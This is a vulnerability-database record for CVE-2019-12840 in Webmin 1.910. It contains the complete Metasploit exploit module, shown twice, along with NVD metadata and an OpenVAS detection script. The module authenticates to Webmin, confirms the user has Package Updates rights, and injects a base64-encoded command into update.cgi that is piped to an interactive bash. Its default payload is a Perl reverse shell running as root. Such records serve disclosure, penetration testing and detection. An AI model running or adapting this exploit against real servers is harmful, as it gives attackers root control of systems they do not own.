{"lastseen": "2019-06-22T11:39:20", "references": [], "description": "", "reporter": "Ozkan Mustafa Akkus", "published": "2019-06-11T00:00:00", "type": "packetstorm", "title": "Webmin 1.910 Remote Command Execution", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-12840"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/WEBMIN_PACKAGEUP_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113409"]}], "modified": "2019-06-22T11:39:20", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2019-06-22T11:39:20", "rev": 2}, "vulnersScore": 7.2}, "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12840"], "modified": "2019-06-11T00:00:00", "id": "PACKETSTORM:153372", "href": "https://packetstormsecurity.com/files/153372/Webmin-1.910-Remote-Command-Execution.html", "viewCount": 186, "sourceData": "`##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##



class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking



include Msf::Exploit::Remote::HttpClient



def initialize(info = {})

super(update_info(info,

'Name' => 'Webmin Package Updates Remote Command Execution',

'Description' => %q(

This module exploits an arbitrary command execution vulnerability in Webmin

1.910 and lower versions. Any user authorized to the \"Package Updates\"

module can execute arbitrary commands with root privileges.

),

'Author' => [

'AkkuS <\u00d6zkan Mustafa Akku\u015f>' # Vulnerability Discovery, MSF PoC module

],

'License' => MSF_LICENSE,

'References' =>

[

['CVE', '2019-12840'],

['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']

],

'Privileged' => true,

'Payload' =>

{

'DisableNops' => true,

'Space' => 512,

'Compat' =>

{

'PayloadType' => 'cmd'

}

},

'DefaultOptions' =>

{

'RPORT' => 10000,

'SSL' => false,

'PAYLOAD' => 'cmd/unix/reverse_perl'

},

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets' => [['Webmin <= 1.910', {}]],

'DisclosureDate' => 'May 16 2019',

'DefaultTarget' => 0)

)

register_options [

OptString.new('USERNAME', [true, 'Webmin Username']),

OptString.new('PASSWORD', [true, 'Webmin Password']),

OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])

]

end



def peer

\"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}\"

end



def login

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'session_login.cgi'),

'cookie' => 'testing=1', # it must be used for \"Error - No cookies\"

'vars_post' => {

'page' => '',

'user' => datastore['USERNAME'],

'pass' => datastore['PASSWORD']

}

})



if res && res.code == 302 && res.get_cookies =~ /sid=(\\w+)/

return $1

end



return nil unless res

''

end



def check

cookie = login

return CheckCode::Detected if cookie == ''

return CheckCode::Unknown if cookie.nil?



vprint_status('Attempting to execute...')

# check version

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, \"sysinfo.cgi\"),

'cookie' => \"sid=#{cookie}\",

'vars_get' => { \"xnavigation\" => \"1\" }

})



if res && res.code == 302 && res.body

version = res.body.split(\"- Webmin 1.\")[1]

return CheckCode::Detected if version.nil?

version = version.split(\" \")[0]

if version <= \"910\"

# check package update priv

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, \"package-updates/\"),

'cookie' => \"sid=#{cookie}\"

})



if res && res.code == 200 && res.body =~ /Software Package Update/

print_status(\"NICE! #{datastore['USERNAME']} has the right to >>Package Update<<\")

return CheckCode::Vulnerable

end

end

end

print_error(\"#{datastore['USERNAME']} doesn't have the right to >>Package Update<<\")

print_status(\"Please try with another user account!\")

CheckCode::Safe

end



def exploit

cookie = login

if cookie == '' || cookie.nil?

fail_with(Failure::Unknown, 'Failed to retrieve session cookie')

end

print_good(\"Session cookie: #{cookie}\")



res = send_request_cgi(

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),

'headers' => { 'Referer' => \"#{peer}/sysinfo.cgi?xnavigation=1\" },

'cookie' => \"sid=#{cookie}\"

)

unless res && res.code == 200

fail_with(Failure::Unknown, 'Request failed')

end



print_status(\"Attempting to execute the payload...\")

run_update(cookie)

end



def run_update(cookie)

@b64p = Rex::Text.encode_base64(payload.encoded)

perl_payload = 'bash -c \"{echo,' + \"#{@b64p}\" + '}|{base64,-d}|{bash,-i}\"'

payload = Rex::Text.uri_encode(perl_payload)



res = send_request_cgi(

{

'method' => 'POST',

'cookie' => \"sid=#{cookie}\",

'ctype' => 'application/x-www-form-urlencoded',

'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),

'headers' =>

{

'Referer' => \"#{peer}/package-updates/?xnavigation=1\"

},

'data' => \"u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages\"

})

end

end



`

", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/153372/webmin_packageup_rce.rb.txt"}

{"cve": [{"lastseen": "2020-09-21T14:54:49", "description": "In Webmin through 1.910, any user authorized to the \"Package Updates\" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-15T20:29:00", "title": "CVE-2019-12840", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12840"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:webmin:webmin:1.910"], "id": "CVE-2019-12840", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12840", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:webmin:webmin:1.910:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-09-26T01:06:05", "description": "This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the \"Package Updates\" module can execute arbitrary commands with root privileges.

", "published": "2019-06-16T15:26:00", "type": "metasploit", "title": "Webmin Package Updates Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12840"], "modified": "2019-06-19T13:31:48", "id": "MSF:EXPLOIT/LINUX/HTTP/WEBMIN_PACKAGEUP_RCE", "href": "", "sourceData": "##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##



class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking



include Msf::Exploit::Remote::HttpClient



def initialize(info = {})

super(update_info(info,

'Name' => 'Webmin Package Updates Remote Command Execution',

'Description' => %q(

This module exploits an arbitrary command execution vulnerability in Webmin

1.910 and lower versions. Any user authorized to the \"Package Updates\"

module can execute arbitrary commands with root privileges.

),

'Author' => [

'AkkuS <\u00d6zkan Mustafa Akku\u015f>' # Vulnerability Discovery, MSF PoC module

],

'License' => MSF_LICENSE,

'References' =>

[

['CVE', '2019-12840'],

['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']

],

'Privileged' => true,

'Payload' =>

{

'DisableNops' => true,

'Space' => 512,

'Compat' =>

{

'PayloadType' => 'cmd'

}

},

'DefaultOptions' =>

{

'RPORT' => 10000,

'SSL' => false,

'PAYLOAD' => 'cmd/unix/reverse_perl'

},

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets' => [['Webmin <= 1.910', {}]],

'DisclosureDate' => 'May 16 2019',

'DefaultTarget' => 0)

)

register_options [

OptString.new('USERNAME', [true, 'Webmin Username']),

OptString.new('PASSWORD', [true, 'Webmin Password']),

OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])

]

end



def peer

\"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}\"

end



def login

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'session_login.cgi'),

'cookie' => 'testing=1', # it must be used for \"Error - No cookies\"

'vars_post' => {

'page' => '',

'user' => datastore['USERNAME'],

'pass' => datastore['PASSWORD']

}

})



if res && res.code == 302 && res.get_cookies =~ /sid=(\\w+)/

return $1

end



return nil unless res

''

end



def check

cookie = login

return CheckCode::Detected if cookie == ''

return CheckCode::Unknown if cookie.nil?



vprint_status('Attempting to execute...')

# check version

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, \"sysinfo.cgi\"),

'cookie' => \"sid=#{cookie}\",

'vars_get' => { \"xnavigation\" => \"1\" }

})



if res && res.code == 302 && res.body

version = res.body.split(\"- Webmin 1.\")[1]

return CheckCode::Detected if version.nil?

version = version.split(\" \")[0]

if version <= \"910\"

# check package update priv

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, \"package-updates/\"),

'cookie' => \"sid=#{cookie}\"

})



if res && res.code == 200 && res.body =~ /Software Package Update/

print_status(\"NICE! #{datastore['USERNAME']} has the right to >>Package Update<<\")

return CheckCode::Vulnerable

end

end

end

print_error(\"#{datastore['USERNAME']} doesn't have the right to >>Package Update<<\")

print_status(\"Please try with another user account!\")

CheckCode::Safe

end



def exploit

cookie = login

if cookie == '' || cookie.nil?

fail_with(Failure::Unknown, 'Failed to retrieve session cookie')

end

print_good(\"Session cookie: #{cookie}\")



res = send_request_cgi(

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),

'headers' => { 'Referer' => \"#{peer}/sysinfo.cgi?xnavigation=1\" },

'cookie' => \"sid=#{cookie}\"

)

unless res && res.code == 200

fail_with(Failure::Unknown, 'Request failed')

end



print_status(\"Attempting to execute the payload...\")

run_update(cookie)

end



def run_update(cookie)

@b64p = Rex::Text.encode_base64(payload.encoded)

perl_payload = 'bash -c \"{echo,' + \"#{@b64p}\" + '}|{base64,-d}|{bash,-i}\"'

payload = Rex::Text.uri_encode(perl_payload)



res = send_request_cgi(

{

'method' => 'POST',

'cookie' => \"sid=#{cookie}\",

'ctype' => 'application/x-www-form-urlencoded',

'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),

'headers' =>

{

'Referer' => \"#{peer}/package-updates/?xnavigation=1\"

},

'data' => \"u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages\"

})

end

end



", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/webmin_packageup_rce.rb"}], "openvas": [{"lastseen": "2020-06-19T18:46:38", "description": "Webmin is prone to a remote code execution (RCE) vulnerability.", "edition": 7, "published": "2019-06-17T00:00:00", "title": "Webmin <= 1.941 Remote Code Execution (RCE) Vulnerability", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12840"], "modified": "2020-06-17T00:00:00", "id": "OPENVAS:1361412562310113409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113409", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH

#

# SPDX-License-Identifier: GPL-2.0-or-later

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.113409\");

script_version(\"2020-06-17T14:30:36+0000\");

script_tag(name:\"last_modification\", value:\"2020-06-17 14:30:36 +0000 (Wed, 17 Jun 2020)\");

script_tag(name:\"creation_date\", value:\"2019-06-17 10:11:59 +0000 (Mon, 17 Jun 2019)\");

script_tag(name:\"cvss_base\", value:\"9.0\");

script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");



script_tag(name:\"qod_type\", value:\"remote_banner\");



script_tag(name:\"solution_type\", value:\"WillNotFix\");



script_cve_id(\"CVE-2019-12840\");



script_name(\"Webmin <= 1.941 Remote Code Execution (RCE) Vulnerability\");



script_category(ACT_GATHER_INFO);



script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");

script_family(\"Web application abuses\");

script_dependencies(\"webmin.nasl\");

script_mandatory_keys(\"usermin_or_webmin/installed\");



script_tag(name:\"summary\", value:\"Webmin is prone to a remote code execution (RCE) vulnerability.\");



script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");



script_tag(name:\"insight\", value:\"Any user authorized to the 'Package Updates' module can execute arbitrary

commands with root privileges via the data parameter to update.cgi.\");



script_tag(name:\"impact\", value:\"Successful exploitation would allow an authorized attacker to gain

control over the target system.\");



script_tag(name:\"affected\", value:\"Webmin through version 1.941.\");



script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure

of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer

release, disable respective features, remove the product or replace the product by another one.\");

# Note: The vendor does not accept the vulnerability as a workable exploit, because it requires that the attacker

# already knows the root password. Hence there will be no fix for it in Webmin.

script_xref(name:\"URL\", value:\"https://pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html\");

script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/46984\");



exit(0);

}



CPE = \"cpe:/a:webmin:webmin\";



include( \"host_details.inc\" );

include( \"version_func.inc\" );



if( ! port = get_app_port( cpe: CPE ) )

exit( 0 );



if( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )

exit( 0 );



version = infos[\"version\"];

location = infos[\"location\"];



if( version_is_less_equal( version: version, test_version: \"1.941\" ) ) {

report = report_fixed_ver( installed_version: version, fixed_version: \"None\", install_path: location );

security_message( data: report, port: port );

exit( 0 );

}



exit( 0 );

", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}